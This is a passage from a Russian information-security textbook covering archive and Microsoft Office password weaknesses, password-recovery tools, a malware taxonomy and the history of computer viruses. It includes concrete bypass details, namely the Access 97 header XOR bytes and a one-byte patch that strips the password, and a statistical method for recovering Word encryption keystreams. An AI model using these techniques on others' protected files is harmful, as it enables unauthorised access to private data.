сле определенного числа ошибок входа в систему, максимальный
срок действия пароля, минимальную длину пароля, удовлетворение
пароля требованиям сложности, требование неповторяемости паро-
лей и т.д.);
24) установить аудит неудачных входов;
25) воспользоваться программами из пакета Microsoft Security Tool Kit,
в частности HFNetChk и Microsoft Baseline Security Analyzer, про-
веряющими наличие установленных обновлений и имеющихся
ошибок в настройке системы безопасности;
160
26) периодически выполнять аудит паролей, используя программу LC+,
или подобные ей.
3.6. Средства защиты файлов и документов

Практически всегда под защитой данных понимается наложение
ограничений на доступ к информации. Эти ограничения, как правило,
бывают трех типов:
 общее ограничение прав доступа;
 временное ограничение доступа;
 ограничение видов доступа.
Пользователь может взаимодействовать с данными двумя основны-
ми способами: локально и удаленно. При удаленном (сетевом) доступе
пользователь сначала проходит процедуры идентификации и аутенти-
фикации, а потом запрашивает у сервера необходимую ему информа-
цию. Сервер выполняет все необходимые проверки и принимает реше-
ние либо о предоставлении доступа, либо об отказе. Для защиты удален-
ных данных разработаны формальные модели разграничения доступа,
описание которых можно найти в любом хорошем учебнике по сетевой
безопасности.
Мы же будем рассматривать ситуации, когда все проверки реали-
зуются локально. То есть пользователь (или противник) теоретически
может полностью контролировать все шаги, которые та или иная про-
грамма выполняет для получения доступа к данным.
В условиях локальности проверок ограничивать, например, период
доступа гораздо сложнее, чем при выполнении контроля на сервере. Но
для простого обеспечения секретности, по идее, нет никаких препят-
ствий — достаточно спросить у пользователя пароль или получить от
него какую-то другую аутентифицирующую информацию, при помощи
хорошей хэш-функции вычислить ключ шифрования и зашифровать на
нем защищаемые данные при помощи стойкого криптографического ал-
горитма. Однако в практических реализациях этой простейшей последо-
вательности действий разработчики ухитряются допускать самые разно-
образные ошибки, значительно снижающие уровень защищенности ин-
формации, а иногда и вовсе сводят его к нулю.
Защита данных может осуществляться в совершенно разных усло-
виях, и, соответственно, в каждом случае необходимо использовать свои
приемы защиты.
161
3.6.1. Механизмы паролирования архиваторов
Многие современные программы упаковки данных (архиваторы)

имеют встроенную поддержку шифрования. Если пользователь пожела-
ет защитить от чужих глаз информацию, находящуюся в архиве, ему
надо при упаковке ввести пароль, а архиватор сам выполнит все осталь-
ные действия. При попытке извлечения зашифрованного файла архива-
тор запросит у пользователя пароль и распакует файл только в том слу-
чае, если пароль верен.
Стоит отметить, что зашифрование всегда выполняется после ком-
прессии, т. к. зашифрованные данные должны быть неотличимы от слу-
чайной последовательности, и, следовательно, архиватор не сможет
найти в них избыточность, за счет удаления которой и происходит упа-
ковка.
ZIP
Алгоритм шифрования ZIP уязвим к атаке на основе открытого тек-
ста и достаточно знать 12 незашифрованных байт (после компрессии),
чтобы расшифровать весь файл за приемлемое время.
Для архивов, содержащих 5 и более файлов и созданных архиватора-
ми, основанными на библиотеке InfoZIP, возможна атака, использующая в
качестве открытого текста данные из заголовков зашифрованных файлов.
Этой атаке были подвержены файлы, созданные при помощи WinZIP, но в
последних версиях этого архиватора проблема была исправлена.
Еще в июле 2002 года компания PKWARE, Inc. выпустила версию
архиватора PKZIP, поддерживающего более стойкие алгоритмы шифро-
вания. Но, видимо, по той причине, что PKZIP позиционируется как
продукт для корпоративных пользователей, новое шифрование не полу-
чило широкого распространения.
Advanced ZIP Password Recovery 2.43R
Как видно из названия, программа Advanced ZIP Password Recovery
(AZPR) служит для восстановления потерянных паролей к ZIP-архивам
(см. рис.27). Она позволяет находить пароли к архивам, созданным ар-
хиваторами PKZIP, WinZIP, InfoZIP и другими ZIP-совместимыми архи-
ваторами. Программа поддерживает два типа атаки: прямой перебор
(brute-force, то есть метод "грубой силы") и перебор по словарю. При
brute-force атаке определяется набор символов (charset), из которых со-
стоит пароль. Этот набор может включать в себя символы национальных
алфавитов (в том числе и русского) как в OEM, так и в ANSI. Устанав-
162
ливается минимальная/максимальная длина пароля. Возможно сохране-
ние всех опций программы в файле проекта. Чтобы подобрать пароль,
содержащий символы криллицы, необходимо определить пользователь-
ский набор, включив соответствующую опцию. Набор символов можно
сохранить в файл для дальнейшей работы.
Рис. 27. Нахождение пароля архива ZIP
ARJ
Популярный во времена DOS, но довольно редко используемый в
настоящее время архиватор, разработанный Робертом Янгом (Robert
Jung), использовал следующий алгоритм шифрования.
Из пароля по очень простому обратимому алгоритму получалась
гамма, равная по длине паролю. Эта гамма накладывалась на шифруе-
мые данные путем сложения по модулю 2 (операция XOR). Таким обра-
зом, наличие открытого текста, равного по длине паролю, позволяло
моментально определить гамму и использованный пароль.
Более того, в самом начале упакованных данных содержалась ин-
формация компрессора, такая как таблицы Хаффмана (Huffman tables), и
часть этой информации могла быть предсказана, что позволяло значи-
тельно повысить скорость поиска пароля перебором.
Начиная с версии 2.60 (ноябрь 1997 года) ARJ поддерживает шиф-
рование по алгоритму ГОСТ 28147-89.
163
Advanced ARJ Password Recovery 1.07R
Программа аналогична предыдущей, но отличается тем, что позво-
ляет восстанавливать пароли к ARJ-архивам (см. рис. 28). Она дает воз-
можность находить пароли к архивам, созданным ARJ, WinARJ и дру-
гими ARJ-совместимыми архиваторами.
Рис. 28. Подбор пароля архива ARJ

В следующих версиях программ разработчики планируют увели-
чить скорость перебора и добавить возможности параллельного перебо-
ра паролей на нескольких машинах, объединенных в сеть. Кроме того,
ожидается появление более развернутых статистических отчетов и
оценки производительности машины при подборе пароля.
Перспективным направлением является и known plain text attack —
восстановление пароля в том случае, если известно содержимое архива
(должен быть достоверно известен хотя бы один файл из архива). Кста-
ти, благодаря тому, что разработчиком является российская фирма, "ши-
роким пользовательским массам" предоставляется возможность выска-
зать свои пожелания непосредственно автору программы.
RAR
Архиватор, разработанный Евгением Рошалем, является неплохим
примером того, как можно подходить к шифрованию данных.
В алгоритме шифрования, используемом в RAR версии 1.5, есть не-
которые недочеты. Так эффективная длина ключа шифрования состав-
ляет всего 64 бита, т. е. перебором 264 вариантов ключа можно гаранти-
рованно расшифровать пароль. Более того, наличие открытого текста
164
позволяет уменьшить множество перебираемых вариантов до 240. Сле-
довательно, атака может быть успешно выполнена даже на одном ком-
пьютере. Скорость перебора на компьютере с процессором Intel Pentium
III 333 МГц составляет примерно 600 000 паролей в секунду.
При переходе к версии 2.0, видимо, была проведена серьезная рабо-
та над ошибками. Во всяком случае, взлом нового алгоритма шифрова-
ния перебором требует примерно 21023 операций, что намного больше,
чем может быть выполнено на современной технике. Об эффективных
атаках, использующих открытый текст, ничего не известно. Скорость
перебора паролей снизилась примерно до 2000 штук в секунду (в 300
раз).
Но разработчики RAR решили не останавливаться на достигнутом.
В версии 3.0, появившейся в мае 2002 года, для шифрования стал ис-
пользоваться алгоритм AES (Rijndael) с ключом длиной 128 бит. Такое
решение выглядит вполне разумным как минимум по двум причинам.
Во-первых, безопаснее использовать проверенный и хорошо зарекомен-
довавший себя алгоритм, чем нечто самодельное, и у AES здесь нет кон-
курентов. А во-вторых, у AES скорость шифрования выше, чем у алго-
ритма, использованного в RAR 2.O.
Кроме замены алгоритма шифрования, в RAR 3.0 используется и
другая процедура получения ключа шифрования из пароля. Эта проце-
дура требует вычисления хэш-функции SHA 1262144 раза, что позволяет
перебирать около 3-х паролей в секунду, т. е. в 600 раз меньше, чем для
RAR 2.0.
3.6.2. Механизмы паролирования документов Microsoft Office

и VBA.
3.6.3. Microsoft Word и Excel
Шифрование файлов было реализовано уже в Microsoft Word 2.0.

Из пароля с помощью легко обратимого алгоритма получалась 16-
байтовая гамма, которая накладывалась на содержимое документа. Но
вычисление гаммы без пароля не составляло никакого труда, т. к. гамма
накладывалась и на служебные области, которые имели фиксированное
значение во всех документах.
В Word 6.0/95 и Excel 5.0/95 алгоритм шифрования не претерпел
значительных изменений, но изменился формат файлов — он стал осно-
вываться на хранилище OLE Structured Storage. Для восстановления па-
165
роля документа все также требовалось найти 16-байтовую гамму, ис-
пользованную для шифрования данных.
Один из методов, позволяющих отыскать гамму, например, для до-
кументов Word, основывается на простейшем статистическом анализе.
Самый часто встречающийся символ в тексте на любом языке — пробел.
Таким образом, достаточно определить код наиболее используемого
символа в каждой из 16 позиций, соответствующих разным байтам гам-
мы. Выполнив операцию XOR каждого найденного значения с кодом
пробела (0x20), мы получим 16 байт гаммы.
В программах Word 97/2000 и Excel 97/2000 данные шифруются
при помощи алгоритма RC4 с ключом длиной 40 бит. Такое шифрование
уже не позволяет моментально определить пароль. Но производитель-
ность вычислительной техники за последние годы выросла настолько
сильно, что единственно правильный ключ шифрования документа Word
(из 240 возможных) может быть найден максимум за четверо суток на
компьютере с двумя процессорами AMD Athlon 2600+.
Начиная с Office XP, наконец появилась поддержка шифрования
документов ключами длиной более 40 бит. Но, похоже, большинство
пользователей до сих пор продолжает использовать 40-битовое шифро-
вание, т. к. оно позволяет открывать защищенные документы в преды-
дущих версиях офисных программ. Да и изменение настроек шифрова-
ния требует дополнительных действий со стороны пользователя (откры-
тия диалога настроек и выбора нужного криптопровайдера), а по умол-
чанию применяются 40-битовые ключи.
3.6.4. Microsoft Access
Базы данных Microsoft Access могут иметь два типа паролей: паро-
ли на открытие и пароли для разграничения доступа на уровне пользова-
теля. Пароль на открытие, похоже, никогда не представлял серьезной
защиты, т. к., начиная с Access версии 2.0, он хранился в заголовке базы
данных. Правда, сам заголовок был зашифрован алгоритмом RC4, но это
не сильно увеличивало стойкость, т. к. в рамках одной версии формата
всегда использовался один и тот же 32-битовый ключ шифрования,
жестко прошитый в динамически загружаемую библиотеку, отвечаю-
щую за работу с файлом базы данных.
А учитывая то, что RC4 — синхронный потоковый шифр, доста-
точно было один раз найти гамму, порождаемую RC4 с известным клю-
чом. После этого пароль можно было определить, выполнив сложение
по модулю 2 гаммы и нужных байт заголовка.
166
Так для Access 97 необходимо было выполнить XOR 13 байт, распо-
ложенных по смещению 0x42 от начала файла базы данных, со следую-
щей последовательностью:
0x86, 0xFB, 0хЕС, 0x37, 0x5D, 0x44, 0х9С, 0xFA, 0хСВ, 0х5Е, 0x28,
0хЕВ, 0x13.
Альтернативный способ снятия пароля заключался в исправлении
заголовка и установке значения байта, соответствующего первому сим-
волу, в такое состояние, чтобы после расшифровки заголовка там оказы-
вался нулевой байт. Тогда Access, интерпретирующий пароль как стро-
ку, заканчивающуюся нулевым символом, увидев ноль в первом байте,
решит, что пароль вообще не установлен. Для снятия пароля в Access 97
необходимо установить байт по смещению 0x42 от начала файла в зна-
чение 0x86. Кстати, разработчики одной коммерческой программы, поз-
воляющей восстановить забытые пароли к базам Microsoft Access, в опи-
сании новшеств очередной версии указали, что время, затрачиваемое на
отыскание пароля, уменьшилось в 1,5 раза. Вероятно, для этого им при-
шлось уменьшить задержку перед выводом найденного пароля на экран,
т. к. значительно сложнее придумать очень медленный способ выполне-
ния XOR, а потом ускорить его в 1,5 раза.
Начиная с Access 2000, простое наложение гаммы уже не позволяет
сразу же определить пароль, т. к. необходимо выполнить еще несколько
дополнительных несложных действий. Но пароль все равно хранится в
заголовке, а значит, может быть оттуда прочитан.
Что самое занимательное, установка пароля на открытие базы данных не
приводит к шифрованию ее содержимого. Однако Access поддерживает та-
кую операцию, как шифрование базы данных, но пароль в этом шифровании
никак не участвует, а ключ шифрования хранится в заголовке файла базы.
Другой тип паролей, поддерживаемых Microsoft Access, использу-
ется не для обеспечения секретности, а для разграничения доступа. Но
при проектировании, похоже, было допущено несколько ошибок, свя-
занных и с этими паролями.
Правильно было бы хранить не пароли, а их хэши. Но, по непонят-
ным причинам, в системной базе данных, содержащей имена, пароли и
прочие атрибуты всех пользователей, можно найти сами пароли, зашиф-
рованные трехкратным DES с двумя ключами в режиме EDE (Encrypt-
Decrypt-Encrypt), когда первый ключ применяется дважды, на первом и
третьем шаге. Ключи, как обычно, являются константами и хранятся в
динамически загружаемой библиотеке. Такая защита позволяет быстро
167
определить пароль любого пользователя, хотя Microsoft утверждает, что
утерянные пароли пользователей Access не могут быть восстановлены.
В системной базе данных для каждого пользователя хранится и
уникальный идентификатор, являющийся функцией от имени пользова-
теля и некоторой произвольной строки, вводимой при создании учетной
записи. И именно этот идентификатор является ключом, по которому
идентифицируются пользователи в основной базе данных.
Так, например, у каждой таблицы в основной базе данных есть вла-
делец, который имеет максимальные права. Но в основной базе данных
хранится только идентификатор пользователя, являющегося владельцем,
а имя и вся вспомогательная информация для аутентификации пользова-
теля хранится в системной базе данных. И создается впечатление, что
если системная база данных будет утеряна, то доступ к содержимому
основной базы данных получить не удастся.
Но функция вычисления идентификатора пользователя сравнитель-
но легко обращаема, что позволяет определить имя владельца иденти-
фикатора и строку, введенную при создании его учетной записи. После
этого остается только создать новую системную базу данных и добавить
в нее пользователя с известными атрибутами, но вообще без пароля.
Advanced Office 97 Password Recovery 1.22R
Парольная защита применяется не только программами-
архиваторами; такую возможность имеют также документы Microsoft
Office. Advanced Office 97 Password Recovery позволяет восстановить
потерянный пароль к документам Word 97, Excel 97 или к любой 32-
битной версии MS Access. Пароли к Word и Excel находятся методами
прямого перебора, перебора по маске и по словарю. Перебор можно
прервать и продолжить в любое время. Пароли для MS Access, пароли
защиты записи и книг/листов MS Excel находятся прямым декодирова-
нием. Возможно сохранение всех опций программы в файле проекта. В
версии 1.22 поддерживаются все документы Office 2000.
168
Рис. 29. Нахождение пароля документа Word
Использование пароля защиты документа от записи как способ за-
щиты является самым слабым. Пароль защиты записи хранится в доку-
менте в чистом виде. Можно даже поискать его любым hex-редактором.
Хранится он в unicode и не требует расхэширования. Снять эту "защиту"
можно изменением одного бита в документе.
Advanced VBA Password Recovery 1.22R
Advanced VBA Password Recovery — программа для восстановле-
ния потерянных паролей к VBA-макросам, встроенным в документы
Microsoft Office 97 (см. рис. 30). Она позволяет находить пароли к мак-
росам Word 97 и Excel 97. Пароли находятся мгновенно, прямым деко-
дированием. В дальнейшем планируется добавление возможности уда-
лять или изменять пароль непосредственно из программы, а также осу-
ществление работы с документами, созданными более современной вер-
сией пакета MS Office 2000.
Рис. 30. Взлом пароля макросов
169
Несмотря на многочисленные напоминания и предупреждения,
пользователи, особенно неопытные, часто применяют в качестве пароля
обычные слова. Конечно, это облегчает его запоминание и использова-
ние, но следует помнить, что в той же степени снижается стойкость па-
роля, поскольку такой пароль можно подобрать простым перебором по
словарю. Этот способ занимает гораздо меньше времени по сравнению с
полным перебором всех возможных вариантов. В любом случае реко-
мендуется сначала попробовать перебор по словарю, а затем уже пере-
ходить к прямому перебору либо перебору по маске.
170
4. МЕТОДЫ И СРЕДСТВА ЗАЩИТЫ ИНФОРМАЦИИ ОТ
ПРОГРАММНО-МАТЕМАТИЧЕСКИХ УГРОЗ
4.1. Современные программно-математические угрозы
информационной безопасности в АС
4.1.1. Классификация программно-математических угроз
Под программно-математическими угрозами понимаются потенци-

ально возможные воздействия вредоносными программами, созданными
специально для уничтожения, блокирования, модификации или копиро-
вания информации, несанкционированного пользователем, или наруше-
ния работы компьютеров или компьютерных сетей.
Viruses and Worms
Вредоносные программы, которые могут без ведома пользователя
саморазмножаться на компьютерах или их в сетях, при этом каждая по-
следующая копия также обладает способностью к саморазмножению
Net-Worm. Размножаются в компьютерных сетях. Отличительной
особенностью данного типа червей является то, что им не нужен пользо-
ватель в качестве звена в цепочке распространения
Email-Worm – вредоносная программа, обладающая способностью к
несанкционированному пользователем саморазмножению по каналам
электронной почты. При этом червь отсылает либо свою копию в виде
вложения в электронное письмо, либо ссылку на свой файл, располо-
женный на каком-либо сетевом ресурсе
IM-Worm – вредоносная программа, обладающая способностью к
систем мгновенного обмена сообщениями (например, ICQ, MSN
Messenger, AOL Instant Messenger, Yahoo Pager, Skype и др.).
IRC-Worm - вредоносная программа, обладающая способностью к
несанкционированному пользователем саморазмножению через Internet
Relay Chats
P2P-Worm - вредоносная программа, обладающая способностью к
файлообменных пиринговых сетей (например, Kazaa, Grokster, EDonkey,
FastTrack, Gnutella и др.)
Worm - вредоносная программа, обладающая способностью к не-
санкционированному пользователем саморазмножению в компьютерных
171
сетях через сетевые ресурсы. В отличие от Net-Worm для активации
Worm пользователю необходимо запустить его.
Virus - вредоносная программа, обладающая способностью к не-
санкционированному пользователем саморазмножению по локальным
ресурсам компьютера
Trojan programs
Вредоносные программы, созданные для осуществления несанкци-
онированных пользователем действий, направленных на уничтожение,
блокирование, модификацию или копирование информации, нарушение
работы компьютеров или компьютерных сетей. В отличие от вирусов и
червей, представители данной категории не обладают способностью к
саморазмножению.
Backdoor - вредоносная программа, предназначенная для несанкци-
онированного пользователем удаленного управления злоумышленником
пораженным компьютером. По своей функциональности они во многом
напоминают различные системы администрирования, разрабатываемые
и распространяемые фирмами- производителями программных продук-
тов.
Trojan - вредоносная программа, предназначенная для осуществле-
ния несанкционированных пользователем действий, влекущих уничто-
жение, блокирование, модификацию или копирование информации,
нарушение работы компьютеров или компьютерных сетей, и при всем
при этом не попадающая ни под одно из нижеприведенных троянских
поведений.
Trojan-Ransom - вредоносная программа, предназначенная для не-
санкционированной пользователем модификации данных на компьюте-
ре-жертве таким образом, чтобы сделать невозможным работу с ними,
либо блокировать нормальную работу компьютера. После того, как дан-
ные «взяты в заложники» (блокированы) пользователю выдвигается тре-
бование выкупа.
Trojan-ArcBomb - представляют собой архивы, специально оформ-
ленные таким образом, чтобы вызывать нештатное поведение архивато-
ров при попытке разархивировать данные — зависание или существен-
ное замедление работы компьютера или заполнение диска большим ко-
личеством «пустых» данных.
Trojan-Clicker - вредоносная программа, предназначенная для не-
санкционированного пользователем обращения к интернет-ресурсам
(обычно к веб-страницам). Достигается это либо посылкой соответству-
ющих команд браузеру, либо заменой системных файлов, в которых ука-
172
заны «стандартные» адреса интернет-ресурсов (например, файл hosts в
MS Windows).
Trojan-DDoS - вредоносная программа, предназначенная для прове-
дения несанкционированной пользователем DoS- (Denial of Service) ата-
ки с пораженного компьютера на компьютер-жертву по заранее опреде-
ленному адресу.
Trojan-Downloader - вредоносная программа, предназначенная для
несанкционированной пользователем загрузки и установки на компью-
тер-жертву новых версий вредоносных программ, установки «троянцев»
или рекламных систем. Загруженные из интернета программы затем ли-
бо запускаются на выполнение, либо регистрируются «троянцем» на ав-
тозагрузку в соответствии с возможностями операционной системы.
Trojan-Dropper - вредоносная программа, предназначенная для не-
санкционированной пользователем скрытой инсталляции на компьютер-
жертву вредоносных программ, содержащихся в теле этого типа «троян-
цев».
Trojan-IM - вредоносная программа, предназначенная для кражи
пользовательских аккаунтов (логин и пароль) от интернет-пейджеров
(например, ICQ, MSN Messenger, AOL Instant Messenger, Yahoo Pager,
Skype и др.). Найденная информация передается злоумышленнику.
Trojan-Notifier - вредоносная программа, предназначенная для не-
санкционированного пользователем сообщения своему «хозяину» о том,
что зараженный компьютер сейчас находится «на связи». При этом на
адрес злоумышленника отправляется информация о компьютере, напри-
мер, IP-адрес компьютера, номер открытого порта, адрес электронной
почты и т. п.
Trojan-Proxy - вредоносная программа, предназначенная для осу-
ществления злоумышленником несанкционированного пользователем
анонимного доступа к различным интернет-ресурсам через компьютер-
жертву.
Trojan-SMS - вредоносная программа, предназначенная для несанк-
ционированной пользователем отсылки SMS-сообщений с пораженных
мобильных устройств на дорогостоящие платные номера, которые жест-
ко записаны в теле вредоносной программы.
Trojan-Spy - вредоносная программа, предназначенная для ведения
электронного шпионажа за пользователем (вводимая с клавиатуры ин-
формация, снимки экрана, список активных приложений и т.д.).
Найденная информация передается злоумышленнику.
173
Trojan-Mailfinder - вредоносная программа, предназначенная для
несанкционированного пользователем сбора адресов электронной почты
на компьютере с последующей передачей их злоумышленнику через
электронную почту, web, ftp или другими способами.
Trojan-GameThief - вредоносная программа, предназначенная для
кражи пользовательской информации, относящейся к сетевым играм.
Найденная информация передается злоумышленнику.
Trojan-PSW - вредоносная программа, предназначенная для кражи
пользовательских аккаунтов (логин и пароль) с пораженных компьюте-
ров.
Trojan-Banker - вредоносная программа, предназначенная для кражи
пользовательской информации, относящейся к банковским системам,
системам электронных денег и пластиковых карт. Найденная информа-
ция передается злоумышленнику.
Rootkit - программа, предназначенная для сокрытия в системе опре-
деленных объектов, либо активности. Сокрытию, как правило, подвер-
гаются ключи реестра (например, отвечающие за автозапуск вредонос-
ных объектов), файлы, процессы в памяти зараженного компьютера,
вредоносная сетевая активность.
Malicious tools
Вредоносные программы, разработанные для автоматизации созда-
ния других вирусов, червей или троянских программ, организации DoS-
атак на удаленные сервера, взлома других компьютеров и т. п. В отличие
от вирусов червей и троянских программ, представители данной катего-
рии не представляют угрозы непосредственно компьютеру, на котором
исполняются (за исключением поведения Packed).
Constructor - программы, предназначенные для изготовления новых
компьютерных вирусов, червей и троянских программ.
DoS - программа, предназначенная для проведения DoS- (Denial of
Service) атаки с ведома пользователя на компьютер-жертву
Exploit - программы, в которых содержатся данные или исполняе-
мый код, позволяющие использовать одну или несколько уязвимостей в
программном обеспечении на локальном или удаленном компьютере с
заведомо вредоносной целью.
Email-Flooder - программы, функцией которых является «забивания
мусором» (бесполезными сообщениями) каналов электронной почты
IM-Flooder - программы, функцией которых является «забивания
мусором» (бесполезными сообщениями) каналов интернет-пейджеров
174
(например, ICQ, MSN Messenger, AOL Instant Messenger, Yahoo Pager,
Skype и др.).
SMS-Flooder - программы, функцией которых является «забивания
мусором» (бесполезными сообщениями) каналов передачи SMS-
сообщений
Flooder - программы, функцией которых является «забивания мусо-
ром» (бесполезными сообщениями) сетевых каналов, отличных от поч-
товых, интернет-пейджеров и SMS (например, IRC)
Spoofer - программы, позволяющие отправлять сообщения и сете-
вые запросы с поддельным адресом отправителя
VirTool - программы, позволяющие злоумышленнику модифициро-
вать другие вредоносные программы таким образом, чтобы они не де-
тектировались антивирусным программным обеспечением
NetGrabber - программы, позволяющие пользователю получать не-
санкционированный доступ к информации передающейся по сетевым
каналам
Hoax - программы, которые не причиняют компьютеру какого-либо
прямого вреда, однако выводят сообщения о том, что такой вред уже
причинен, либо будет причинен при каких-либо условиях, либо преду-
преждают пользователя о несуществующей опасности. К «злым шут-
кам» относятся, например, программы, которые «пугают» пользователя
сообщениями о форматировании диска (хотя никакого форматирования
на самом деле не происходит), детектируют вирусы в незараженных
файлах, выводят странные вирусоподобные сообщения и т. д. — в зави-
симости от «чувства юмора» автора такой программы.
Packed - программы, которые были упакованы с помощью специа-
лизированных программ сжатия, созданных злоумышленниками с целью
сокрытия их вредоносного функционала
HackTool - программа, используемая злоумышленниками при орга-
низации атак на локальный или удаленный компьютер (например, не-
санкционированное пользователем внесение нелегального пользователя
в список разрешенных посетителей системы; очистка системных журна-
лов с целью сокрытия следов присутствия в системе и т.д.).
PUPS
Потенциально-нежелательные программы (PUPs, Potentially
Unwanted Programs) - это программы, которые разрабатываются и рас-
пространяются легальными компаниями, могут использоваться в повсе-
дневной работе, например, системных администраторов. Проблема за-
ключается в том, что некоторые программы обладают набором функций,
175
которые могут причинить вред пользователю только при выполнении
ряда условий.
Adware – рекламное программное обеспечение (Adware, Browser
Hijackers) предназначено для показа рекламных сообщений (чаще всего,
в виде графических баннеров), перенаправления поисковых запросов на
рекламные web-страницы, а также для сбора данных маркетингового ха-
рактера о пользователе (например, какие тематические сайты посещает
пользователь), что позволяет сделать рекламу гораздо более таргетиро-
ванной.
Pornware - программы, которые так или иначе связаны с показом
пользователю информации порнографического характера.
Riskware - к этой категории относятся легальные программы (неко-
торые из них свободно продаются и широко используются в легальных
целях), которые, тем не менее, в руках злоумышленника способны при-
чинить вред пользователю.
4.1.2. Компьютерные вирусы
История компьютерных вирусов (КВ) ведет свой отсчет с середины

70-х годов - с появления игровых программ на ЭВМ. , Идейной основой
их создания следует считать концепцию самовоспроизводящихся авто-
матов, конструктивно разработанную Дж. фон Нейманом (США). Она
базируется на теореме, смысл которой состоит в том, что конечный ав-
томат, достигший определенного уровня сложности, может реплициро-
вать (воспроизводить) себя и естественно саморазрушаться. Говоря ина-
че, способность к саморазмножению и самодеструкции является неотъ-
емлемым свойством всякой достаточно сложной программы или вычис-
лительного устройства. В 1951 г. Дж. фон Нейман предложил метод по-
строения автоматов данного класса.
Несколько позднее (1959 г.) F.G. Stahl (США) довел до программ-
ного уровня (на языке ЭВМ IBM 650) модель поведения неких организ-
мов, которые могли двигаться, питаться и размножаться. При размноже-
нии была предусмотрена возможность мутации, в результате которой
новый организм оказывался способным к пожиранию себе подобных
и/или не мог размножаться. В 1961г. группа американских программи-
стов (в их числе был Роберт Моррис) предложила довольно необычную
для того времени игру "Дарвин", в которой несколько программ разных
видов, названных организмами, должны были убивать представителей
другого вида, размножаться и занимать жизненное пространство. Игра
быстро распространилась, особенно в студенческой среде. Описание
176
этой игры было опубликовано лишь в 1972 г. Примечательным в нем
было то, что для идентификации одного из видов организмов использо-
вался термин "вирус". Эта безобидная игровая программа несла в себе
элементы вирусной технологии. Явно видимая аналогия между компью-
терными и биологическими вирусами повлекла за собой широкое ис-
пользование при рассмотрении вирусных программ и соответственно
средств борьбы с ними биолого-медицинской терминологии.
В 1974 г. была написана программа Rabbit (Кролик), которая раз-
множалась на трех связанных между собой ЭВМ. При размножении
программы происходило замедление реакции, а затем и полное зависа-
ние ЭВМ. Это была первая вирусоподобная программа. За ней последо-
вал ряд других. Популяризации программ-вирусов во многом способ-
ствовали научно-фантастические романы данной направленности [16].
В 1980 г. появилась первая публикация по компьютерным вирусам -
"Самовоспроизводящиеся программы" И. Крауса (ФРГ). В ней был
впервые определен термин "компьютерный вирус" и были приведены
листинги некоторых известных компьютерных вирусов. Данное И. Кра-
усом определение компьютерного вируса не претерпело серьезных из-
менений до сих пор.
Под компьютерным вирусом понимается программа, которая мо-
жет включать в другие программы свою, иногда модифицированную ко-
пию, способную к дальнейшему размножению и выполнению вредных
воздействий [2]. В ГОСТ Р 51188-98 "Защита информации" дано следу-
ющее определение КВ. Компьютерный вирус - программа, способная
создавать свои копии (необязательно совпадающие с оригиналом) и
внедрять их в файлы, системные области компьютера, компьютерных
сетей, а также осуществлять иные деструктивные действия. При этом
копии сохраняют способность дальнейшего распространения.
Зараженную вирусом программу можно рассматривать как автома-
тически созданный вид троянской программы. Скрытым модулем в ней
является тело вируса, а одним из несанкционированных действий - за-
ражение других программ. Другими несанкционированными действиями
могут быть: стирание файлов, разрушение каталогов и т.п.
Жизненный цикл компьютерных вирусов, как и других искусствен-
ных объектов включает три стадии:
создание вируса;
функционирование вируса;
прекращение его существования.
177
Стадия создания вирусной программы во многом совпадает со ста-
дией создания программ общего и специального назначения. Отличия
имеют место главным образом при внедрении.
Для стадии функционирования вируса характерны следующие эта-
пы (фазы):
Латентная фаза (фаза выжидания),
Инкубационная фаза (фаза размножения),
Проявление вируса (выполнение деструктивных действий).
Некоторые вирусы могут не иметь латентной фазы и фазы проявле-
ния - они только размножаются. Примером таких вирусов являются так
называемые "черви" (репликаторы).
После обнаружения вирус уничтожается, и принимаются меры по
предотвращению его распространения. Однако не исключены случаи
повторного заражения данным вирусом, например, сохранившимся в ка-
ком-нибудь архивном файле. Исходя из этого, время существования ви-
русов связывается со временем использования одной или ряда версий
операционной системы компьютера. Дело в том, что в вирусах исполь-
зуются особенности построения конкретной версии операционной си-
стемы и, естественно, привязанные к ней вирусы с переходом на другую
версию теряют полностью или частично свою работоспособность. Виру-
сы повышенной сложности (изощренности) более жестко привязывают-
ся к операционной системе и существуют, как правило, в рамках жизни
одной ее версии. Что касается простых вирусов, то их жизненный цикл
может захватывать время использования нескольких версий операцион-
ной системы.
Таким образом, основными предпосылками появления и развития
компьютерных вирусов следует считать:
работы по самовоспроизводящимся автоматам;
создание игровых программ с приданием им функций оказания воз-
действия на другие программ;
массовое использование ПЭВМ;
широкое распространение вычислительных сетей.
Анализ построения вирусных программ показывает, что они созда-
ются как новичками в программировании, только-только пробующими
свои силы, так и профессиональными, нередко даже талантливыми про-
граммистами (безусловно, качество "творений" тех и других существен-
но отличается). Сам собой возникает вопрос, что побуждает заниматься
вирусной деятельностью. К побудительным мотивам создания вирусов
относят:
178
стремление к самоутверждению (хотя бы и таким образом);
желание отомстить обидчику;
недопонимание последствий воздействия компьютерных вирусов в
различных областях применения ЭВМ;
определенная уверенность в безнаказанности за вирусный ванда-
лизм;
сознательное стимулирование рыночного спроса на антивирусное
обеспечение;
проявление программистского хулиганства.
Первой мерой противодействия компьютерным вирусам считают
составление списка опасных загружаемых программ, известного под
названием "Черная дюжина" (1985 г.). В это же время появилась первая
антивирусная программа, позволявшая выявить путем контекстного
анализа вызывающие подозрение участки загружаемой программы.
Первые случаи массового заражения КВ были зафиксированы в
1987 году. Начало массовым заражениям (эпидемиям) положил Паки-
станский вирус. Данный тип вируса создавался братьями Амджатом и
Базитом Алви для наказания американцев, которые в Пакистане скупали
по низкой цене получаемые незаконным тиражированием копии про-
грамм. После распродажи инфицированных продуктов копирования
только в США оказались зараженными более 18 тысяч персональных
компьютеров. Вслед за Пакистанским вирусом возбудителями эпидемий
выступали Лехайский вирус (США), Иерусалимский вирус (Израиль) и
другие.
Обычные компьютерные вирусы и их разновидности (логические
бомбы, черви, троянские кони) стали объектом повышенного внимания
со стороны зарубежных военных специалистов. Они отводят вирусам
роль одного из средств ведения информационной войны. Считается, что
с помощью вирусов можно осуществлять эффективные диверсии в энер-
гетических, транспортных, банковских и других жизненно важных си-
стемах и изолировать противника от остального мира.
4.1.3. Механизмы действия компьютерных вирусов
Вирус приводится в действие (активизируется) только в результате

запуска на выполнение программы, которую он инфицировал. Действие
вирусов состоит в множественном заражении и проявлении.
Заражение является обычно начальным и обязательным действием
вируса. Используются два вида стратегий заражения:
179
1) стратегии, основанные на поиске заражаемых файлов путем про-
смотра каталогов:
 заражение всех файлов, удовлетворяющих критерию выбора, зада-
ваемому файловыми атрибутами;
 заражение всех файлов из текущего каталога;
 заражение одного файла в каталоге, в котором находится запуска-
емый на выполнение файл;
 заражение файлов главного каталога;
 заражение файлов, путь доступа к которым указан в команде
PATH;
 заражение по одному случайно выбираемому файлу в каждом ка-
талоге.
